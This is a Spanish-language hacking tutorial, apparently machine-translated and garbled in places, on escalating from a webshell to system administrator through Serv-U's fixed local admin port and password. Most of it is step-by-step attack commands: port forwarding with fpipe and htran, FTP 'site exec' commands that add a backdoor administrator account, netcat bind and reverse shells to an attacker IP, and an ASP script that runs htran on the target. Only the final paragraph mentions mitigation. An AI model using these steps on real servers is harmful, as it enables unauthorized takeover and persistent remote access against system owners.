Webshell y Serv-u se combinaron para obtener la máxima autoridad del sistema

  
Serv-U monitoreo predeterminado 127.0.0.1:43958, en esta máquina se puede conectar a este puerto de administración, la cuenta de administración predeterminada de Serv-U es localAdministrator, la contraseña predeterminada es "# l @ $ ak # .lk; 0 @ P ", esta contraseña es fija. Ejecute fpipe -v -l 12345 -r 43958 127.0.0.1 en la máquina de destino, y luego cree un nuevo SERVIDOR con "Administrador de Serv-U" en su propia máquina. IP objetivo: 12345 Usuario: LocalAdministrator Pass: "#l@$ak#.lk; 0 @ P" 0 Entonces el Serv-U de la máquina objetivo depende de usted. La premisa del uso: SHELL con la autoridad normal de la máquina de destino, no necesita poder iniciar sesión en el terminal o la consola física, siempre que haya una shell, el programa que puede ejecutar el reenvío de datos del puerto puede obtener una inyección de shell: sql para obtener webshell o directamente Cargue webshell utilizando la vulnerabilidad de carga inferior a 7.0 sp2 método de implementación concreto
1. Use la carga obtenida de webshell para transferir el programa, luego ejecute fpipe -v -l 12345 -r 43958 127.0.0.1 2. Por su cuenta Máquina, use "Serv-U administrador" para crear un nuevo SERVIDOR, complete el puerto IP: target IP: 12345 Usuario: LocalAdministrator Pass: "#l@$ak#.lk; 0 @ P" Ahora puede administrar este servidor Serv-U, cree una nueva cuenta, el administrador del sistema (administrador del sistema) y otorgue el permiso de "ejecutar" (ejecutar) en la opción "Acceso a la dirección". 3. Conexión ftp, luego ejecute
 citar el sitio exec net usuario iisuser contraseña /agregarAgregar un usuario llamado iisuser contraseña a contraseña, agregarlo a la cuota de grupo de administradores exec net localgroup administradores iisuser /agregar, ahora puede conectarse Recoge el terminal e inicia sesión. Por supuesto, también puede realizar otras operaciones, como cargar un nc.exe y obtener un shell con privilegios de administrador en la máquina de destino, ya sea hacia adelante o hacia atrás. Conexión de reenvío: conéctese a ftp y ejecute 
 exec nc.exe del sitio de cotización -l -p 23 -t -e cmd.exe En este momento, el host de destino se convierte en un servidor telnet, puede telnet al servidor de destino 23 Puerto. Conexión inversa: suponga que su IP es 202.96.209.168 1. Ejecútela en su propia máquina (debe tener una IP externa): nc -vv -lp 99 2. Ejecute nc -e cmd en la máquina de destino. Exe 202.96.209.168 99 En su máquina obtendrá un shell con privilegios de administrador en la máquina de destino. Si la otra parte tiene filtrado de puertos o configura una protección de firewall (esta protección no limita la conexión de rebote, si está restringida, se cambiará) Otros métodos) se pueden implementar utilizando el reenvío TCP SOCKET. Por ejemplo: Mi máquina es A; la máquina que quiero probar es B [No permitir conexión frontal]. ¿Ya tengo SHELL en B [siempre que el invitado esté en ella]? Nos podemos conectar entre sí al 43958: I: Estoy escuchando en el puerto local 23 y 56 23 está esperando a que B se conecte; 56 me está esperando a que me conecte; II: B está conectado a mi monitor 23, y se reenvía al local El 43958 se construirá así. ¿El firewall de la otra parte no nos llevará de ninguna manera? En este punto, ejecute Serv-U localmente para crear un nuevo SERVIDOR, complete el IP en el puerto local 127.0.0.1 para 56 usuarios del administrador local, contraseña #l@$ak#.lk; 0 @ P.  método de implementación concreto 
Supongamos que su IP es 202.96.209.168 1. Ejecute htran.exe -listen 23 56 en su propia máquina; 2. Ejecute Serv-U localmente para crear un nuevo SERVIDOR, relleno de IP El puerto local 127.0.0.1 es 56, el nombre de usuario LocalAdministrator, contraseña #l@$ak#.lk; 0 @ P; Ejecute htran.exe en la máquina de destino: esclavo 127.0.0.1 43958 202.96.209.168 23 Si no puede ejecutar directamente en webshell, puede escribir un script asp para ejecutarlo, de la siguiente manera:
 connect.asp <% Set oScript = Server. CreateObject ("WSCRIPT.SHELL") oScript.Run (server.mappath ("htran") &"-slave 127.0.0.1 43958 202.96.209.168 23")% > Ejecute http: //destination URL /connect.asp, Si sale en blanco, no se indica ningún error, ahora debería poder administrar el Serv-U del servidor de destino, y el resto dependerá de su juego libre. Htran.exe es una herramienta de reenvío de paquetes de múltiples subprocesos que puede descargarse desde Red Alliance  Preventing Method 
para parchear Serv-U, cambiar el puerto predeterminado y administrar la contraseña. Modifique los dos archivos ServUAdmin.exe y ServUDaemon.exe, y cambie el puerto siempre que agregue LocalSetupPortNo = 12345 en la opción [GLOBAL] del archivo ServUDaemon.ini. Desafortunadamente, la última versión de Serv-U Serv-U 5.2.0.0 todavía está disponible. Sin cambios, el puerto de administración predeterminado y la contraseña siguen siendo los originales.
Copyright © Conocimiento de Windows All Rights Reserved